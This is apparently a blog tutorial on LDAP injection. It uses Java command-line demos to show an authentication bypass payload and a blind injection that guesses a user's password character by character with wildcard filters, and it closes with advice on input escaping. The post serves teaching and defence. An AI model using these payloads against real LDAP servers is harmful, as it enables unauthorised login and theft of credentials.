Everybody knows about SQL injections. It’s like a celebrity in the world of software security. But there are much more many different types of injection attacks which may feel jealous about popularity of SQL injections. That’s not fair. Let’s try to feel the gap, and talk about LDAP injections.

What is LDAP?

LDAP stands for Lightweight Directory Access Protocol. It’s a client-server binary protocol which lets clients access directory services. LDAP normally runs over TCP/IP, but it’s also much better to use TLS. LDAP is defined in RFC 2251.

  • Java has an LDAP client API (JNDI)

What is an LDAP injection?

LDAP injection is an injection attack in which an attacker can insert malicious LDAP statements in to the original LDAP query used by an application. As a result, an attacker may be able to send malicious LDAP requests to the LDAP server which may lead to security implications such as reading or updating sensitive information. LDAP injections usually occur because an application fails to properly sanitize untrusted data which may come from an adversary.

An example of LDAP injection

Let’s assume that we have an internal LDAP server behind the firewall. This LDAP server is used by an application for user authentication. The application requests user’s credentials, and then checks if they are valid by searching for a record in the LDAP database.

$ javac -d classes LDAPLogin.java 
$ java -classpath classes LDAPLogin bob secret
LDAP query: (&(uid=bob)(userPassword=secret))
Access granted
$ java -classpath classes LDAPLogin bob wrong
LDAP query: (&(uid=bob)(userPassword=wrong))
Access denied
$ java -classpath classes LDAPLogin "bob)(|(uid=bob" "wrong)"
LDAP query: (&(uid=bob)(|(uid=bob)(userPassword=wrong)))
Access granted
  • Version of LDAP server
  • Application logic
  • AND operator goes first. It looks like (&(field1=value1)(field2=value2)). This kind of search request is used by the application above.
  • OR operator goes first. It looks like (|(field1=value1)(field2=value2)).

Blind LDAP injections

Blind LDAP injections are similar to blind SQL injections. An application may be vulnerable to LDAP injection, but it may not print out all requested fields. This doesn’t allow an attacker to simply dump the content of LDAP directory. But if the application shows somehow if LDAP search requests with injected data succeed or not, then this behavior allows an attacker to ask yes/not questions. As a result, it may be possible to implement an efficient bruteforce attack, and extract data from the LDAP database.

$ javac -d classes LDAPInfo.java 
$ java -cp classes LDAPInfo bob
LDAP query: (&(uid=bob)(objectClass=person))
Phone: telephoneNumber: 555-9999
$ java -cp classes LDAPInfo boba
LDAP query: (&(uid=boba)(objectClass=person))
Nobody found!
$ java -cp classes LDAPInfo "bob)(userPassword=a*"
LDAP query: (&(uid=bob)(userPassword=a*)(objectClass=person))
Nobody found!
$ java -cp classes LDAPInfo "bob)(userPassword=a*"
LDAP query: (&(uid=bob)(userPassword=a*)(objectClass=person))
Nobody found!
$ java -cp classes LDAPInfo "bob)(userPassword=b*"
LDAP query: (&(uid=bob)(userPassword=b*)(objectClass=person))
Nobody found!
$ java -cp classes LDAPInfo "bob)(userPassword=c*"
LDAP query: (&(uid=bob)(userPassword=c*)(objectClass=person))
Nobody found!
[...]
$ java -cp classes LDAPInfo "bob)(userPassword=s*"
LDAP query: (&(uid=bob)(userPassword=s*)(objectClass=person))
Phone: telephoneNumber: 555-9999

How to prevent LDAP injections

Nothing surprising here. Input validation and sanitation help to prevent LDAP injections. Applications should escape all data that comes from untrusted sources and which is used in LDAP queries. OWASP has an article about it (see below) which may be applied not only to Web applications.

$ ldapsearch -h ldap.server m -x -b "dc=test,dc=com" "(&(uid=test)(userPassword=a*))"
....
# search result
search: 2
result: 53 Server is unwilling to perform
text: Function Not Implemented, search filter attribute userpassword is not indexed/cataloged

# numResponses: 1
LDAP injection

I write about Java, security, electronics and DIY

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store